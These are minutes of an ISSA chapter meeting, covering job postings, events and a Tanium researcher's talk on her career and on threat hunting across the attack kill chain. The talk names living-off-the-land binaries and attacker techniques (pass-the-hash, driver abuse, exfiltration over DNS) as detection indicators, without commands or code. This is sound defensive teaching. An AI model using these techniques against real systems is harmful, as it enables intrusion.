ISSA Monthly Meeting: 11 July 2023:

WELCOME/AGENDA:

Roops opens meeting and welcomes attendees to July ISSA meeting of 2023; Admin: in person-Zoom, After meeting give feedback (what we can improve) Goes over topics intended to be covered to include discussing changes and looking over Board Structure and Bylaws, membership, vote concerns, meetings and New Board members.

MEMBERSHIP BENEFITS:

ISSA membership aids in helping IT professionals stay current, hear industry leaders speak, and professional development. As well as CPE/COUs, best practice/practical solutions, and employment opportunities.
Three people have gotten jobs from our last cyber social! Great to know those connections are being made. student discount for membership, reach out to Charles.

EDUCATION:

Certification resources, videos, lots—we encourage you to check out the website (https://issa-hr.org/security-resources, https://issa-hr.org/reading-list
Some examples of resources: video education, tools, some are free such as Cybrary, INE, Pluralsight, CBTNuggets—all a step above YouTube, great to build knowledge and skillset.

Featured book of the month, the Cyber Effect (author here), last month was the Art of Invisibility, education chair manages the book club if you’d like to learn more get in touch.
Reading List: case on US teenager indicted for credential stuffing sports betting website.
MANY more resources available on the website.

NATIONAL CONFERENCES:

defcon and blackhat, Infosecworld 2023

LOCAL CONFERENCES:

VirginiaCyberEducon (Charlottesville VA) (very educator-focused), SANS Virginia Beach 2023 (Aug 21- Sep 1, Virginia Beach, VA)

GOVT RELATED:

3rd Annual Critical Infrastructure Security Summit (July 26-27, Alexandria, VA)
5^th Annual Information Warfare Symposium (July 26-27, National Harbor, MD)
4^th Annual Digital Forensics for National Security Symposium (August 2-3, College Park, MD)

MEETINGS and SOCIAL EVENTS:

Next social event, 19^th of July at casual Pint at 7PM, early bird 5:30, One of the ROM inventors was at the last social! Wild! That’s the kind of variance you can see at those kinds of events.
August: Charles Herring, (Witfoo CTO) September: TBD, October: Adam Shostack, (Shostack&Associates)  November: John Bos, (Cybrex LLC founder/CEO). Looking for presentation speaker for September/next year as well as backup speakers. After this meeting networking happy hour at Plaza Dellogado.

NEED A JOB: HAVE A JOB:

Based on board meetings, it’s been determined to go over this prior to the speaker.

NEED A JOB:

Good to have a prepared elevator pitch not required, but this segment provides a good time to practice (~30 seconds is average). –include a greeting (your FULL name), your past (what you have done and for how long), your present (What you are doing now) and your future (what you want to do/pursue): Intro, Summary of what you do, explain your value, what problem you can solve, call to action. Include items like: Clearance, Remote/On site work preferred, Willingness to relocate, additional education/certs not covered in pitch, any other short details. We can post your email in the chat if you want and we will ensure it gets to anyone interested.

HAVE A JOB:

John B: has some maybe jobs: contingent hires while proposing, manning up workforce, if approved job is possible. Sometimes it takes a long time, nothing binding about a contingent hire role. in the midst of propose: staffing instructors at naval war college in RI, good for military operating background, Not management but it’s remote, cloud people, IT system stuff. If you join an effort as a contingent hire you’re not obligated but it’s a possibility.
Johnnie S: Works at SAIC at service desk (NMCI SIPR), to date there are two contracts and one offer resultant of our meetings, will reimburse Sec+ if you obtain it through them (required within first 6 months), SAIC is one of the contractor entities that will sponsor for clearance vetting.
Melissa B (speaker): Works at Tanium: endpoint security operations management company, expanding support center, paid 8 weeks of training to learn platform, move IT support center—(for folks without dedicated account management support.)  Troubleshooting, entry level stuff, no requirement to 5 years in security—other requirements talk to Melissa, Been at Tanium just over 3 years. They invest in growth. Internship cycle, paid, start taking apps in autumn, decisions made in January/February.

Ken: Sentara is hiring in SOC: Junior SOC analyst and architects, internship (Paid, send resume to Charles if interested.)  
John: companies can find interns through subsidized state grants.

SPEAKER PRESENTATION: Melissa Bischoping from Tanium: PART I

Melissa Bischoping, Endpoint security research director at Tanium.
SANS MSISE Student 2023
Passionate about incident response, memory forensics, threat intelligence, purple team ops.

Career stuff: “Luck is what happens when preparation meets opportunity” -Seneca:
Teenage mother, went into pre-nursing but hated it, worked as managing aviation records clerk, when she was doing receptionist work she learned she may be good in the IT Project field. Technical side of career is six years, getting the foot into the door by college experience, got an internship where her husband is stationed. 

Melissa left for Louisiana early to start the internship (IT at a casino,) was able to live at a room in the casino waiting for her husband’s transfer, living the casino life for three weeks, during that time, she attended war rooms and looked over shoulders and spent as much time as she could learning what she could. The casino did not have the budget to keep her on, but she was so determined her supervisor got in touch with casinos across the nation,  found one across the street, She got a job with them the job working in IT for seven weeks, first day brought into office, set up a PIXI system and was able to image dozens of computers, which opened her an opportunity to her next job, and a 20k raise.

The same company got hit with ransomware at the time she worked there, finishing her degree and practicing using HackTheBox, plugging through the processes and learning what she could–she recognized the log from this experience and was able to help out, when asked what she wanted to do she was offered a title of cybersecurity management.  led MSSP project, at this point her husband is due to transfer again. Melissa got a call from DC area, to whom she did not know who the customer even was. 
Over the years she was able to work in DC at levels of scale not yet known to her. 

Now as an endpoint security research director she was able to write her own job description, able to write code and detections to be run on millions of devices. She wants to show us that here in IT there is no linear path. Tech pivots quickly, don’t be the person that doesn’t want to try new programs. LANs, CTFS (she’s on the SANS CTF team), be curious, do puzzles, read about stuff in other domains: education tech helps you to be more rounded and understand empathy.

(A.C.E the H.A.C.K ): Adaptability, Curiosity, Empathy, Humility, Approachability, Credibility, Kindness. Melissa suggests the benefits that come with asking for mentorship, mentees, and making yourself available–feedback in a kind way. Integrity is HUGE at Tanium: accept failure, proactively disclose mistakes, DON’T BS. Praise and recognition go a long way. Don’t be “out for glory” it “doesn’t matter where you are in the pecking order” YOU create culture through little moments of kindness, I.e., feedback, compliment, friendly email/follow up, that bring loyalty and appreciation in a business, building bridges is helped with kindness.

PART II: THREAT HUNTING OPPURTUNITIES ALONG ACROSS THE KILL CHAIN:

Fundamental IT hygiene:

like Maslow’s hierarchy, there is a security hierarchy of Needs, these levels help to identify where you are and where you need to go next. One tier is dependent on the other, base level is INVENTORY— (What is ours?): if you don’t know what you have you can’t protect everything. (Who is that?): Identify Unusual behavior. (Do I expect that?): detect deviations and anomalies; as important as EDR alerts.
Detection Opportunities: No attack is invisible. ESPECIALLY not in memory “it can run but it cannot hide” Melissa looks for abnormalities in memory forensics, but there are tons of places these attacks can be detected: Endpoints, network, cloud, application.

LOBINS/LOLBAS:

Already on the OS: (Eventvwr.exe, certutil.exe, cmd.exe, dllhost.exe, regsvr32.exe, rundll32.exe, control.exe, mshta.exe and MORE!) vendor signed, and leveraged at every stage of an attack. LOLBAS Project has 184 candidates.
Detecting Modern Attack Behavior: Look for anomalies, proactively detect your own misconfigurations, understand “exploitability” vs “vulnerability”. Human operated- can change on the fly-
may be dismissed until viewed holistically.

Attacker Behavior:

multiple paths to profit: ransom, extortion, Visibility, and correlation allow multiple opportunities for detection and disruption.


“Dumb/Different/Dangerous”
Dumb: security theater, blind spots, missteps, bad configs that lead to easy wins for attacker.
Different: Things that make you tilt your head—usually worth looking into.
Dangerous: High likelihood to be evidence of a threat actor’s behavior, warrants IMMEDIATE attention.

Initial access and execution:

Paths to success: Phishing, stolen credentials, access brokering, vulnerable public-facing services (RDP, VPN, Public networks). Anomaly detection: Least-occurring behaviors in a data set, “users” are normal, but is their behavior? Their goal = to reduce noise, highlight what is interesting and different.

Dumb: Vulnerable public-facing services: RDP, VPN, Vulnerable public/internal services, Users as local admins.
Different: DNS anomalies, user-agent strings, nonstandard port/traffic combinations, TLDs, locations of interest.
Dangerous: Uptick in password failures (can indicate brute force), uncommon remote logins, “first seen” locations/systems for a user, Mailbox forwarding rules.

Persistence:

First goal after compromise is to create a way to get back in by way of: install/replace/abuse LOLBINS, registry modifications, new local users/admins, autorun/startup/Winlogon, WMI Event subscriptions, remote assistance apps/backdoors, C2 frameworks, fileless malware. Detection can be difficult, unless you: know parent-child process relationships, correlate network, and endpoint activity.

Dumb: Blindly trusting Office Templates and “protected view”
Different: Binary replacement, autoruns/Scheduled Tasks, Nonstandard protocol use, use account changes
Dangerous: LOLBINS in URLs & .net/.eu/.ru TLDs, GitHub/Pastebin/etc. addresses, exe/image extensions, processes that normally don’t use the network now are. Knowing the attack method helps you in this kind of long run.

Privilege Escalation/Lateral Movement:

Any opportunity to expand reach and gather new access is attractive to an adversary. Increased access: User > service account, user > system, user > another user. Obfuscate behind multiple accounts, blend in with “trusted” accounts. Methods: account takeover, pass-the-hash, Unattended answer files, autologin credentials, leverage legitimate services (SMB, RDP)

Dumb: Autologin/unattended .xml file and plaintext passwords stored on disk, scheduled task environment variables, permissions creep over time, open access to system admin tools (WMI, PSExec, Remote Access)
Different: unusual child processes of common UAC bypass binaries, Unfamiliar/new/first-time east-west traffic, service accounts with interactive logons.
Dangerous: Users simultaneously logged in to multiple systems, Logins on-premises form remote workers, vice-versa.

Defense Evasion:

Disrupting tooling: modifying firewall rules, event logs, exclusions, malicious binaries masquerading as legitimate, Bring-Your-Own-Vulnerable-Driver (BYOVD). Camouflage and covering tracks: Purchasing expired categorized domains, Mark-of-the-Web Bypass.

Dumb: not turning on Script Block logging, Assuming signed = trusted, Wildcard exclusions.
Different: Configuration scope creep, Zip/ISO files (MotW bypass), Abuse of trusted/benign protocols (Discord, Teams, etc.)
Dangerous: Security tooling is disabled or modified, process injection, Leveraging BYOVD.

Discovery/Enumeration:

Bursts of discovery commands, unusual PowerShell connections, unusual parent processes for network activity. Enumeration of: OS & AD information, Users/groups/Network Shares and Permissions, services, open ports, Apps, security tooling, LOLBINS/LOLBAS, network Configurations, — all of this can be easy to miss or dismiss as not interesting–correlation is key!

Dumb: Blocking NMAP will NOT save you, not turning on Script Block logging.
Different: Unusual users or service accounts enumerating.
Dangerous: common enumeration commands are not dangerous UNTIL you have multiple detections, odd command line arguments (i.e.: svchost.exe -p 80,22,443)

Data Collection and Exfiltration:

Staging of files/folders, service disruption and exfiltration: temporary directories, archive utilities/commands, FTP/File sharing apps, upload to an attacker-hosted website, anomalous east-west traffic. Stopping applications that may have locks on files of interest for exfiltration/encryption: exchange, SQL, etc. large amount of data over encrypted channels: (who’s sending 20GB of data over DNS?) Are you doing break-and-inspect? Otherwise, your only detection is the amount of data.

Dumb: Something the sysadmin did that allowed exfiltration to happen, unapproved FTP/File share/Collaborations tools installed on the endpoint.
Different: Zip files in odd directories, sudden account access to many files, uptick in read/write on disk that is outside normal business behavior/hours.
Dangerous: Anomalies in traffic—if there’s a large amount of data headed to a strange IP address, you have a problem– Could you say what a normal amount of traffic looks like on a given protocol? Would you detect a sudden uptick in data?

What do we do now?:

Were on this list might you have missed a detection opportunity?
1. Map your network
2. Scan your network
3. Map your network again (if you found something new/unusual)
4. Discover and inventory hardware assets
5. Discover and inventory software assets
6. Document your data flows
7. Approve those data flows
8. Make 1-7 a source with REAL-TIME data and update CONSTANTLY
9. Lock down unapproved elements